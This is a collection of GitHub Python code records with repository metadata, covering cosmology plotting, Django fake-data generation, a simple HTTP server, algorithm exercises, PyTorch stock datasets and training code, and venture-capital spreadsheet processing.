h5file.close()\n\n power_spec_this_grp = pd.read_csv(pk_filepath, sep='\\t', dtype='float64', names=['k', 'Pk'], header=0)\n # power_spec_folding_this = pd.read_csv(os.path.join(snapdir,f\"powerspecs/powerspec_{i:03d}.txt\"), sep='\\s+', usecols=[0,1], names=['k', 'Delk'], skiprows=5)\n\n if power_spec_all is None:\n power_spec_all = power_spec_this_grp.copy()\n # power_spec_folding_all = power_spec_folding_this.copy()\n else:\n power_spec_all.append( power_spec_this_grp )\n # power_spec_folding_all.append( power_spec_folding_this )\n\n # print(power_spec_folding_this)\n\n power_spec_grp1 = power_spec_all.groupby(pd.cut(power_spec_all['k'], bins=merge_bin)).mean()\n\n # power_spec_folding_all.sort_values('k', inplace=True)\n # power_spec_folding = power_spec_folding_all[power_spec_folding_all['k'].between(1e-3,1e2)]\n # power_spec_folding_grp1 = power_spec_folding.groupby(pd.cut(power_spec_folding['k'], bins=merge_bin)).mean()\n # power_spec_folding_grp1['pk'] = power_spec_folding_grp1['Delk']*power_spec_folding_grp1['k']**-3*2*np.pi**2\n\n ax2.plot(power_spec_grp1['k'],power_spec_grp1['Pk'], color=color, linestyle='dashed', label=f\"z={f'{round(snap.redshift,1):f}'.rstrip('0').rstrip('.'):s}\")[0]\n ax2.scatter(power_spec_grp1['k'],power_spec_grp1['Pk'], color=color, s=4)\n\n # power_spec_folding_grp1.plot('k', 'pk', loglog=True, color=lighter(color), linestyle='dashdot', lw=0.8, ax=ax2, label='', legend=False)\n t_bef, t_now = t_now, time()\n print(t_now - t_bef, f'redshift z={round(snap.redshift,1)} done')\n\nax2.plot([],[], ' ', label=f\"GADGET-4 simulation\")\nax2.plot([],[], linestyle='dashed', color='gray', label=f\" {scheme}-{grid_size:d} grid\")\nax2.plot([],[], linestyle='dashdot', color=lighter('gray'), label=f\" folding technique\")\n# ax2.plot([],[], linestyle='dashed', color=lighter(lighter('gray')), label=f\" for reference\")\nax2.plot([],[], ' ', label=f\"Halofit model\")\nax2.plot([],[], linestyle='solid', color=darker('gray'), label=' Takahashi, 2012')\n# ax2.plot([],[], linestyle='solid', color=lighter('gray'), label=' HMcode-2020')\n# ax2.plot([],[], ' ', label=f\"linear theory\")\nax2.plot([],[], linestyle=(0, (1, 1)), color='gray', label='linear theory')\n# in snapshot-{i:03d}\n# pdb.set_trace()\n\n\n# ax2[1].plot(power_spec['lam'],power_spec['Pk'])\nax2.set_xlabel(r\"$k$ ($h$ Mpc$^{-1}$)\")\nax2.set_ylabel(r\"$P(k)$ ($h^{-1}$Mpc)$^3$\")\nax2.set_xscale('log')\nax2.set_yscale('log')\nax2.set_xlim(k_start*0.8,1.2*k_nyq)\nax2.set_ylim(top=1e5, bottom=2e-1)\nax2.grid(True)\nax2.set_title(f\"Matter power spectrum at different redshifts\")\nax2.legend()\n\nplt.tight_layout()\n# plt.show()\n# pdb.set_trace()\nfig1.savefig(os.path.join(plotsdir, f'{rundir_str:s}_{scheme}{theme:s}.pdf'))\n# fig1.savefig(os.path.join(plotsdir, f'{rundir_str:s}_{scheme}{theme:s}.png'))\n# fig1.savefig(os.path.join(plotsdir, f'single_snapshot_pk_{i:03d}{theme:s}.svg'))","repo_name":"premvijay/cosmo-sims","sub_path":"sanity_checks/matter_power_spec/test_with_models.py","file_name":"test_with_models.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38083740166","text":"from typing import List, Any\nimport random\nimport string\nimport os\nfrom faker import Faker\n\nfrom django.core.management import BaseCommand\nfrom django.contrib.auth import get_user_model\n\nfrom news.models import (\n Subscriber,\n Reporter,\n Agency,\n Category,\n News,\n)\nfrom news.services.news import create_unique_token\n\n\ndef get_random_obj(objects: List[Any]) -> Any:\n random_index = random.randint(0, len(objects) - 1)\n return objects[random_index]\n\n\ndef generate_fake_data():\n SUBSCRIBER_COUNT = int(os.getenv(\"SUBSCRIBER_COUNT\", 100))\n AGENCY_COUNT = int(os.getenv(\"AGENCY_COUNT\", 10))\n REPORTER_PER_AGENCY = int(os.getenv(\"REPORTER_PER_AGENCY\", 2))\n NEWS_COUNT = int(os.getenv(\"NEWS_COUNT\", 1000))\n\n fake = Faker()\n # Create subscribers\n subscribers = []\n for i in range(SUBSCRIBER_COUNT):\n username = fake.user_name()\n email = f\"{username}@example.com\"\n password = ''.join(random.choices(string.ascii_letters + string.digits, k=8))\n user = get_user_model().objects.create_user(username=username, email=email, password=password)\n subscriber = Subscriber.objects.create(user=user)\n subscribers.append(subscriber)\n\n reporters = []\n for i in range(AGENCY_COUNT):\n agency = Agency.objects.create(name=fake.company(), description=fake.paragraph())\n for j in range(REPORTER_PER_AGENCY):\n subscriber = subscribers[i * REPORTER_PER_AGENCY + j]\n reporter = Reporter.objects.create(\n subscriber=subscriber,\n avatar=None,\n agency=agency,\n about_me=fake.paragraph(),\n )\n reporters.append(reporter)\n\n categories = [Category.objects.create(title='Sports', description=fake.text()),\n Category.objects.create(title='Weather', description=fake.text()),\n Category.objects.create(title='Travel', description=fake.text()),\n Category.objects.create(title='International', description=fake.text()),\n Category.objects.create(title='Politics', description=fake.text()),\n Category.objects.create(title='Economics', description=fake.text())]\n\n for i in range(NEWS_COUNT):\n reporter = get_random_obj(reporters)\n news = News.objects.create(\n title=fake.sentence(),\n agency=reporter.agency,\n author=reporter,\n token=create_unique_token(),\n image=None,\n description=fake.text(),\n is_draft=fake.boolean(),\n )\n news_categories = []\n if fake.boolean():\n news_categories.append(get_random_obj(categories))\n if fake.boolean():\n news_categories.append(get_random_obj(categories))\n news.categories.set(news_categories)\n\n\nclass Command(BaseCommand):\n help = 'Generate some fake data for testing'\n\n def handle(self, *args, **options):\n generate_fake_data()\n","repo_name":"kysre/johar","sub_path":"news/management/commands/generate_fake_data.py","file_name":"generate_fake_data.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71800789853","text":"import threading\nimport webbrowser\nimport BaseHTTPServer\nimport SimpleHTTPServer\nimport pandas as pd\n\nimport getdata\n\nFILE = 'frontend.html'\nPORT = 8002\n\n\nclass TestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"The test example handler.\"\"\"\n\n def do_POST(self):\n \"\"\"Handle a post request\"\"\"\n length = int(self.headers.getheader('content-length')) \n data_string = self.rfile.read(length)\n try:\n result = getdata.last_six(data_string)\n result = result.to_html()\n result = \"

\"+data_string+\"

\"+result\n result = unicode(result)\n except:\n result = 'error'\n self.wfile.write(result)\n \n def do_GET(self):\n \"\"\"Handle a get request\"\"\"\n length = int(self.headers.getheader('content-length')) \n data_string = self.rfile.read(length)\n try:\n result = pd.read_csv(\"prediction.csv\")\n result = getdata.select_columns(result, columns=['Date','HomeTeam','AwayTeam','Prediction'])\n result = result.to_html()\n except:\n result = 'error'\n self.wfile.write(result)\n\n\ndef open_browser():\n \"\"\"Start a browser after waiting for half a second.\"\"\"\n def _open_browser():\n webbrowser.open('http://localhost:%s/%s' % (PORT, FILE))\n thread = threading.Timer(0.5, _open_browser)\n thread.start()\n\ndef start_server():\n \"\"\"Start the server.\"\"\"\n server_address = (\"\", PORT)\n server = BaseHTTPServer.HTTPServer(server_address, TestHandler)\n server.serve_forever()\n\nif __name__ == \"__main__\":\n open_browser()\n start_server()","repo_name":"DarylWinslow/Soccer_Data_Project","sub_path":"Code/HTML/SimpleHTTPServer/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23910028124","text":"# https://leetcode.com/problems/linked-list-cycle/\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n s = set()\n p = head\n\n while p:\n if p in s:\n return True\n s.add(p)\n p = p.next\n\n return False\n","repo_name":"h-spear/problem-solving-python","sub_path":"leetcode/linked-list/linked-list-cycle.py","file_name":"linked-list-cycle.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"71238861535","text":"import pandas as pd\nimport pytz as lc\n\nstamp=pd.Timestamp('2012-09-09 12:12')\nstamp_utc=stamp.tz_localize('utc')\n\nstamp_utc.tz_convert('America/New_York')\nprint(stamp_utc)\n\nnow=pd.Timestamp.now()\nprint(now)\nprint(lc.common_timezones)","repo_name":"bobsunjack/python-test","sub_path":"test/time_test.py","file_name":"time_test.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26231239882","text":"# 2.1: Remove Dups\n\nfrom linked_list import LinkedList\n\n# Runtime: O(n) - Space: O(n)\ndef remove_dups(ll: LinkedList):\n seen = set()\n prev = None\n curr = ll.head\n\n while curr:\n if curr.data in seen:\n prev.next = curr.next\n\n seen.add(curr.data)\n prev = curr\n curr = curr.next\n\n\nll = LinkedList()\nll.add(2)\nll.add(5)\nll.add(3)\nll.add(5)\n\nremove_dups(ll)\nll.print()\n","repo_name":"DatGreekChick/ctci","sub_path":"linked-lists/python/remove_dups.py","file_name":"remove_dups.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73924958175","text":"from classes import Product\ndef insertProduct(dict1):\n name = input(\"Enter the new name: \")\n while name in dict1.keys():\n print(\"The product is already registered\") \n name = input(\"Enter the new name: \")\n if len(dict1) == 10:\n print(\"Cannot add product, dictionary is full\")\n else:\n price = float(input(\"Enter the new price: \"))\n stock = int(input(\"Enter the new stock: \")) \n product = Product(name, price, stock)\n dict1[name] = [product.price, product.stock]\n \n\ndef searchProduct(dict1):\n name = input(\"Enter the name of the product: \")\n if name not in dict1.keys():\n print(\"Product not found\")\n else:\n values = dict1.get(name)\n product = Product(name,values[0], values[1])\n print(\"The price is\", product.price)\n print(\"The stock is\", product.stock)\n\ndef modifyProduct(dict1):\n name = input(\"Enter the name of the product: \")\n if name not in dict1.keys():\n print(\"Product not found\")\n else:\n price = float(input(\"Enter the new price: \"))\n stock = int(input(\"Enter the new stock: \")) \n dict1[name] = [price, stock]\n \n\n\n# Program init\nproducts = dict() \nchoice = None\nmenu = '''\n MENU:\n 1. Add a new product\n 2. Search for a product\n 3. Modify price and stock\n 4. Exit\n '''\nwhile choice != 4:\n print(menu)\n choice = int(input(\"Select your option: \"))\n while choice not in range(1,5):\n print(\"INVALID CHOICE\")\n choice = int(input(\"Select your option: \"))\n if choice == 1: \n insertProduct(products)\n elif choice == 2:\n searchProduct(products)\n elif choice == 3:\n modifyProduct(products)\nprint(\"See you soon!\")\n \n\n\n","repo_name":"madebypixel02/Python-Weekly-Exercises-2019","sub_path":"Week 11/Exercise 6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"723664502","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom .Tokenizer import Tokenizer, MAX_LEN\nfrom .DataReader import DataReader\nimport os\n\nclass StockDataset(Dataset):\n def __init__(self, datadir, re_path, tokenizer):\n Dataset.__init__(self)\n self.reader = DataReader(datadir)\n self.tk = tokenizer\n self.files = self.reader.listfiles(re_path)\n self.file_size = len(self.files)\n \n def __getitem__(self, index):\n file = self.reader.readyaml(self.files[index])\n stdfenshi = file[\"stdchange\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n stdfenshi = torch.Tensor(stdfenshi).long()\n return stdfenshi, seqlen\n \n def __len__(self):\n return self.file_size\n \n def checkds(self):\n for ix in range(self.file_size):\n file = self.reader.readyaml(self.files[ix])\n stdfenshi = file[\"stdchange\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n if seqlen < 31:\n file_path = str(self.files[ix]).replace('\\\\', '/')\n os.remove(file_path)\n print(file_path)\n \n \nclass StockDatasetCHL(Dataset):\n def __init__(self, datadir, re_path):\n Dataset.__init__(self)\n self.reader = DataReader(datadir)\n self.tk = Tokenizer(grid=100, maxlen=MAX_LEN)\n self.files = self.reader.listfiles(re_path)\n self.file_size = len(self.files)\n \n def __getitem__(self, index):\n file = self.reader.readyaml(self.files[index])\n stdfenshi = file[\"stdchange\"]\n stdhigh = file[\"stdhigh\"]\n stdlow = file[\"stdlow\"]\n stdfenshi, seqlen = self.tk.tokenize(stdfenshi)\n stdhigh, seqlen_h = self.tk.tokenize(stdhigh)\n stdlow, seqlen_l = self.tk.tokenize(stdlow)\n assert seqlen == seqlen_h == seqlen_l\n stdfenshi = torch.Tensor(stdfenshi).long()\n stdhigh = torch.Tensor(stdhigh).long()\n stdlow = torch.Tensor(stdlow).long()\n return stdfenshi, stdhigh, stdlow, seqlen\n \n def __len__(self):\n return self.file_size","repo_name":"Aldenhovel/i-love-coding","sub_path":"py/GPSM/utils/StockDataset.py","file_name":"StockDataset.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"33"} +{"seq_id":"588128848","text":"def run():\n \"\"\"\n Escribir un programa que almacene las asignaturas de un curso\n (por ejemplo Matemáticas, Física, Química, Historia y Lengua)\n en una lista y la muestre por pantalla el mensaje Yo estudio ,\n donde es cada una de las asignaturas de la lista.\n \"\"\"\n\n subjects = [\"Mathematics\", \"Physics\", \"Chemistry\", \"History\", \"Language\"]\n for subject in subjects:\n print(f\"Yo estudio {subject}\")\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"javieramayapat/play_with_python_excercises","sub_path":"list_tuples/challenge_2.py","file_name":"challenge_2.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73740501215","text":"from __future__ import division\n\nimport sys\nimport json\nimport os\nimport time\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torch.optim\n\nimport models\nfrom datasets import get_dataset\nfrom utils import Logger\nfrom utils import AverageMeter\nfrom utils import save_checkpoint\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\ncudnn.benchmark = True\n\n\ndef update_learning_rate(optimizer, epoch, args, cur_batch, num_batches):\n lr_init = args.get('lr_init', 0.1)\n num_epochs = args['num_epochs']\n\n T_total = num_epochs * num_batches\n T_cur = (epoch % num_epochs) * num_batches + cur_batch\n lr = 0.5 * lr_init * (1 + math.cos(math.pi * T_cur / T_total))\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n return lr\n\n\ndef error_k(output, target, ks=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n max_k = max(ks)\n batch_size = target.size(0)\n\n _, pred = output.topk(max_k, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n results = []\n for k in ks:\n correct_k = correct[:k].view(-1).float().sum(0)\n results.append(100.0 - correct_k.mul_(100.0 / batch_size))\n return results\n\n\ndef train(epoch, model, criterion, optimizer, dataloader, logger, args):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n error_top1 = AverageMeter()\n error_top5 = AverageMeter()\n\n # Switch to train mode\n model.train()\n num_batches = len(dataloader)\n check = time.time()\n for n, (images, labels) in enumerate(dataloader):\n images, labels = images.to(device), labels.to(device)\n data_time.update(time.time() - check)\n\n lr = update_learning_rate(optimizer, epoch, args, n, num_batches)\n\n check = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Compute gradient and do SGD step\n model.zero_grad()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Measure elapsed time\n batch_time.update(time.time() - check)\n\n # Measure accuracy and record loss\n top1, top5 = error_k(outputs.data, labels, ks=(1, 5))\n batch_size = images.size(0)\n losses.update(loss.item(), batch_size)\n error_top1.update(top1.item(), batch_size)\n error_top5.update(top5.item(), batch_size)\n\n if n % 10 == 0:\n logger.log('[Epoch %3d; %3d] [Time %.3f] [Data %.3f] [Loss %f] [LR %.3f]' %\n (epoch, n, batch_time.value, data_time.value, losses.value, lr))\n check = time.time()\n\n logger.log('[DONE] [Time %.3f] [Data %.3f] [Loss %f] [Train@1 %.3f] [Train@5 %.3f]' %\n (batch_time.average, data_time.average, losses.average,\n error_top1.average, error_top5.average))\n logger.scalar_summary('loss', losses.average, epoch)\n logger.scalar_summary('train_1', error_top1.average, epoch)\n logger.scalar_summary('batch_time', batch_time.average, epoch)\n\n\ndef test(epoch, model, criterion, dataloader, logger=None):\n batch_time = AverageMeter()\n losses = AverageMeter()\n error_top1 = AverageMeter()\n error_top5 = AverageMeter()\n\n # Switch to eval mode\n model.eval()\n with torch.no_grad():\n for n, (images, labels) in enumerate(dataloader):\n images, labels = images.to(device), labels.to(device)\n\n check = time.time()\n outputs = model(images)\n loss = criterion(outputs, labels)\n\n # Measure elapsed time\n batch_time.update(time.time() - check)\n\n # Measure accuracy and record loss\n top1, top5 = error_k(outputs.data, labels, ks=(1, 5))\n\n batch_size = images.size(0)\n losses.update(loss.item(), batch_size)\n error_top1.update(top1.item(), batch_size)\n error_top5.update(top5.item(), batch_size)\n\n if n % 10 == 0:\n if logger:\n logger.log('[Test %3d] [Time %.3f] [Loss %f] [Test@1 %.3f] [Test@5 %.3f]' %\n (n, batch_time.value, losses.value, error_top1.value, error_top5.value))\n else:\n print('[Test %3d] [Time %.3f] [Loss %f] [Test@1 %.3f] [Test@5 %.3f]' %\n (n, batch_time.value, losses.value, error_top1.value, error_top5.value))\n\n if logger:\n logger.log(' * [Error@1 %.3f] [Error@5 %.3f] [Loss %.3f]' %\n (error_top1.average, error_top5.average, losses.average))\n logger.scalar_summary('error_1', error_top1.average, epoch)\n logger.scalar_summary('error_5', error_top5.average, epoch)\n logger.scalar_summary('loss_test', losses.average, epoch)\n\n return error_top1.average\n\n\ndef main(args, fn):\n logger = Logger(fn)\n\n hparams = args['model_hparams']\n if args['dataset'] in ['cifar10', 'fmnist']:\n hparams['n_classes'] = 10\n elif args['dataset'] == 'cifar100':\n hparams['n_classes'] = 100\n elif args['dataset'] == 'tinyimg':\n hparams['n_classes'] = 200\n elif args['dataset'] == 'imagenet':\n hparams['n_classes'] = 1000\n logger.log(args)\n hparams['dataset'] = args['dataset']\n\n model = models.__dict__[args['model']](hparams)\n logger.log(model)\n\n if torch.cuda.is_available():\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n logger.log('Multi-GPU mode: using %d GPUs for training.' % n_gpus)\n model = nn.DataParallel(model).cuda()\n else:\n logger.log('Single-GPU mode.')\n model = model.cuda()\n else:\n n_gpus = 0\n\n # Configure parameters to optimize\n pg_normal = []\n pg_small = []\n\n for p in model.parameters():\n if not p.requires_grad:\n continue\n elif hasattr(p, 'wd_small') and p.wd_small:\n pg_small.append(p)\n else:\n pg_normal.append(p)\n\n params = [\n {'params': pg_normal, 'weight_decay': 1e-4},\n {'params': pg_small, 'weight_decay': 1e-5}\n ]\n\n # Define loss function (criterion) and optimizer\n criterion = nn.CrossEntropyLoss().to(device)\n optimizer = torch.optim.SGD(params,\n lr=args.get('lr_init', 0.1),\n momentum=args.get('momentum', 0.9),\n nesterov=True)\n\n train_set, test_set = get_dataset(args['dataset'])\n n_workers = max(8*n_gpus, 4)\n train_loader = torch.utils.data.DataLoader(train_set,\n shuffle=True,\n pin_memory=True,\n batch_size=args['batch_size'],\n num_workers=n_workers)\n test_loader = torch.utils.data.DataLoader(test_set,\n shuffle=False,\n pin_memory=True,\n batch_size=args['batch_size'],\n num_workers=n_workers)\n\n best = 100.0\n for epoch in range(args['num_epochs']):\n train(epoch, model, criterion, optimizer, train_loader, logger, args)\n error = test(epoch, model, criterion, test_loader, logger)\n\n # Perform dealloc/realloc for SelectiveConv2d modules\n for m in model.modules():\n if type(m).__name__ in ['SelectiveConv2d']:\n if epoch < 0.5 * args['num_epochs']:\n m.dealloc()\n m.realloc()\n\n if isinstance(model, nn.DataParallel):\n save_states = model.module.state_dict()\n else:\n save_states = model.state_dict()\n\n is_best = (best > error)\n if is_best:\n best = error\n save_checkpoint(epoch, args, best,\n save_states, optimizer.state_dict(),\n logger.logdir, is_best)\n logger.scalar_summary('best', best, epoch)\n logger.log('[Epoch %3d] [Test %5.2f] [Best %5.2f]' % (epoch, error, best))\n\n\nif __name__ == '__main__':\n config_path = sys.argv[1]\n with open(config_path) as file:\n config = file.read()\n print(config)\n args = json.loads(config)\n config_fn = os.path.split(config_path)[-1].split('.')[0]\n\n main(args, config_fn)\n\n","repo_name":"jh-jeong/selective-convolution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"33"} +{"seq_id":"70728451614","text":"import pandas as pd\n\ndef read_file(path):\n df_all = pd.read_excel(path, header=0) #Y://Data//python//Liq//Table2_new.xlsx\n return df_all #header=0, i.e. first row parsed as column name\n\n \n#reason: pd read year data as float, thus need to change\ndef transformDF(df_all):\n oldtime1 = df_all['投资时间'].tolist()\n newtime1 = []\n for i in range(len(oldtime1)):\n if '.' not in str(oldtime1[i]):\n newtime1.append('')\n else:\n newtime1.append(str(int(oldtime1[i])))\n\n # replace this col\n df_all_new = df_all.replace(to_replace=df_all['投资时间'].tolist(), value=newtime1)\n return df_all_new\n\n#common function, unique elements with a same order \ndef unilst(lst):\n uni=[]\n for i in range(len(lst)):\n if lst[i] in uni:\n continue\n else:\n uni.append(lst[i])\n return uni\n\ndef mainprocess(df_all_new):\n org = df_all_new['机构代码'].tolist()\n uni_org = unilst(org)\n t2_orgnum = [] #(org,year) as primary key\n t2_year = []\n t2_exp = [] #investment experience (number of companies invested/year)\n t2_idscul = []#cumulative number of industries this org has entered\n t2_vca = [] #type VC-series A\n t2_vcb = []\n t2_vcc = []\n t2_vcd = []\n t2_vce = []\n t2_vcm = [] # missing value count\n t2_newids = [] #number of new industries entered/year\n t2_newdist = [] #number of new districts entered/year\n for i in range(len(uni_org)): #loop of orgs\n df_suborg = df_all_new[df_all_new['机构代码'] == uni_org[i]]\n\n lst_tempyear = [int(ele) for ele in df_suborg['投资时间'] if ele != '']\n if len(lst_tempyear) == 0:\n continue\n\n max_year = max(lst_tempyear)\n min_year = min(lst_tempyear)\n\n industry_cum = 0\n industry_lst = []\n new_district_lst = []\n for j in range(max_year - min_year + 1): #loop of years /org\n df_subyear = df_suborg[df_suborg['投资时间'] == str(min_year + j)]\n VC_A = 0\n VC_B = 0\n VC_C = 0\n VC_D = 0\n VC_E = 0\n VC_miss = 0\n new_industry = 0\n new_district = 0\n #print(min_year + j)\n #print('length', len(df_subyear))\n #print(df_subyear)\n\n if len(df_subyear) == 0: #no data here\n year = str(min_year + j)\n exp = 0\n industry_cum = industry_cum\n VC_A = 0\n VC_B = 0\n VC_C = 0\n VC_D = 0\n VC_E = 0\n VC_miss = 0\n new_industry = 0\n new_district = 0\n else:\n year = str(min_year + j)\n exp = len(df_subyear['投资企业'])\n\n for k in range(len(df_subyear['行业'])):\n #print(df_subyear['行业'].tolist()[k])\n if df_subyear['行业'].tolist()[k] == '':\n continue\n if df_subyear['行业'].tolist()[k] not in industry_lst:\n industry_lst.append(df_subyear['行业'].tolist()[k])\n new_industry += 1\n industry_cum += 1\n else:\n continue\n\n for k in range(len(df_subyear['投资性质'])):\n if df_subyear['投资性质'].tolist()[k] == '':\n VC_miss += 1\n continue\n if df_subyear['投资性质'].tolist()[k] == 'VC-Series A':\n VC_A += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series B':\n VC_B += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series C':\n VC_C += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series D':\n VC_D += 1\n elif df_subyear['投资性质'].tolist()[k] == 'VC-Series E':\n VC_E += 1\n else:\n VC_miss += 1\n\n for k in range(len(df_subyear['地区'])):\n if df_subyear['地区'].tolist()[k] == '':\n continue\n if df_subyear['地区'].tolist()[k] not in new_district_lst:\n new_district += 1\n new_district_lst.append(df_subyear['地区'].tolist()[k])\n else:\n continue\n # print(industry_cum)\n t2_orgnum.append(uni_org[i])\n t2_year.append(year)\n t2_exp.append(exp)\n t2_idscul.append(industry_cum)\n t2_vca.append(VC_A)\n t2_vcb.append(VC_B)\n t2_vcc.append(VC_C)\n t2_vcd.append(VC_D)\n t2_vce.append(VC_E)\n t2_vcm.append(VC_miss)\n t2_newids.append(new_industry)\n t2_newdist.append(new_district)\n\n print(\"org:%10s,year:%5s,exp:%d,induscul:%d,A:%d,B:%d,C:%d,D:%d,E:%d,Miss:%d,newindus:%d,newdist:%d\" %\n (uni_org[i], year, exp, industry_cum, VC_A, VC_B, VC_C, VC_D, VC_E, VC_miss, new_industry, new_district))\n\n\n\n#multiple lists into a single dataframe\ndef lst_to_df(t2_orgnum,t2_year,t2_exp,t2_idscul,t2_vca,t2_vcb,t2_vcc,t2_vcd,t2_vce,t2_vcm,t2_newids,t2_newdist):\n t2df = pd.DataFrame(\n {'ORG_NUM': t2_orgnum,\n 'YEAR': t2_year,\n 'EXPERIENCE/year': t2_exp,\n 'CUMUL-INDUSTRY': t2_idscul,\n 'VC_typeA': t2_vca,\n 'VC_typeB': t2_vcb,\n 'VC_typeC': t2_vcc,\n 'VC_typeD': t2_vcd,\n 'VC_typeE': t2_vce,\n 'VC_miss': t2_vcm,\n 'NEW_INDUSTRY/year': t2_newids,\n 'NEW_DISTRICT/year': t2_newdist\n })\n #rearrange the order of columns \n t2df_f = t2df[\n ['ORG_NUM', 'YEAR', 'EXPERIENCE/year', 'CUMUL-INDUSTRY', 'VC_typeA', 'VC_typeB', 'VC_typeC', 'VC_typeD',\n 'VC_typeE',\n 'VC_miss', 'NEW_INDUSTRY/year', 'NEW_DISTRICT/year']]\n return t2df_f\n\n#write a df to a xlsx file\ndef df_to_xlsx(df,path):\n writer = pd.ExcelWriter(path)\n df.to_excel(writer, 'Sheet1')\n writer.save()\n\ndef check_list_value():\n disset=set(df_all['投资性质'].tolist())\n print(disset)\n\n\ndef main():\n df_all=read_file('Y://Data//python//Liq//Table2_new.xlsx')\n df_all_new=transformDF(df_all)\n mainprocess(df_all_new)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ladzzzz123/VC_Data_ETL","sub_path":"ADV_transform/Table2process.py","file_name":"Table2process.py","file_ext":"py","file_size_in_byte":6576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"11124006030","text":"from fastapi import APIRouter, HTTPException\nfrom app.config.database import conn\nfrom app.models.model import models\nfrom app.schemas.model import Model\n\nmodel = APIRouter(\n tags=['models']\n)\n\nclass ModelNameAlreadyExist(Exception):\n pass\n\n@model.get('/models')\nasync def get_models():\n try:\n return { \"models\": conn.execute(models.select()).fetchall() }\n except Exception:\n raise HTTPException(500, \"Failed to load models.\")\n\n@model.post('/models', status_code=201)\nasync def create_model(model: Model):\n try:\n existing_model = conn.execute(models.select().where(models.columns.name == model.name)).first()\n\n if existing_model is not None:\n raise ModelNameAlreadyExist(\"Failed to create model! There is already a model using that name.\")\n\n conn.execute(models.insert().values(\n name = model.name\n ))\n\n # Returns the last AUTO_INCREMENT generated id per-connection.\n result = conn.execute('SELECT LAST_INSERT_ID() AS id').fetchone()\n return { \"id\": result['id'] }\n except ModelNameAlreadyExist as error:\n raise HTTPException(409, str(error))\n except Exception:\n raise HTTPException(500, \"Failed to create model.\")\n","repo_name":"Papajohn77/VRP_Solver","sub_path":"backend/app/routers/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17504823398","text":"# Solved by @kitanoyoru\n# https://leetcode.com/problems/reshape-the-matrix/\n\nfrom typing import List\n\n\nclass Solution:\n def matrixReshape(self, mat: List[List[int]], r: int, c: int) -> List[List[int]]:\n if (len(mat) * len(mat[0])) / c != r:\n return mat\n\n ans: List[List[int]] = []\n\n [row, col] = [0, 0]\n\n for i in range(r):\n ans.append([])\n for _ in range(c):\n ans[i].append(mat[row][col])\n if col == len(mat[row]) - 1:\n row += 1\n col = 0\n else:\n col += 1\n\n return ans\n","repo_name":"kitanoyoru/compscie","sub_path":"leetcode/566. Reshape the Matrix/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"14006271088","text":"def quick_sort(arr):\n if not isinstance(arr, list):\n raise ValueError(\"Input must be a list\")\n \n if len(arr) <= 1:\n return arr\n\n pivot = arr[len(arr) // 2]\n left = [x for x in arr if x < pivot]\n middle = [x for x in arr if x == pivot]\n right = [x for x in arr if x > pivot]\n\n return quick_sort(left) + middle + quick_sort(right)\n\nif __name__ == \"__main__\":\n # Test cases for input validation\n # try:\n # quick_sort(\"invalid_input\")\n # except ValueError as e:\n # print(f\"Error: {e}\")\n \n try:\n quick_sort([])\n except ValueError as e:\n print(f\"Error: {e}\")\n\n # Test cases for the Quick Sort algorithm\n arr1 = [3, 6, 8, 10, 1, 2, 1]\n arr2 = [9, 7, 5, 3, 1]\n arr3 = [1, 2, 3, 4, 5]\n\n print(quick_sort(arr1)) # Should print [1, 1, 2, 3, 6, 8, 10]\n print(quick_sort(arr2)) # Should print [1, 3, 5, 7, 9]\n 